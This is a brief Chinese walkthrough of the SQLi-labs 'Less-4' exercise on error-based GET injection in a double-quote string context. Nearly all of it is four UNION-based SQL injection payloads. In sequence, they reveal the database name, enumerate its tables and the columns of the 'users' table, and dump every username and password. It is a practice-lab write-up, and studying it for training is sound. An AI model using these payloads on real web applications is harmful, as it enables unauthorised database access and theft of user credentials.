【SQL注入】Less-4错误型GET双引号字符型注入

Less-4错误型GET双引号字符型注入

实验漏洞复现介绍

该实验与Less-3错误型GET单引号变形字符型注入 区别在于，构建payload更改")单引号；)表示变形！

1、爆开数据库

payload

?id=0") union select 1,2,database() --+

2、爆开数据表

payload

?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3、表开数据列(字段)

payload

?id=0") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4、爆开数据值

payload

?id=0") union select 1,group_concat(username,0x3a,password),3 from users--+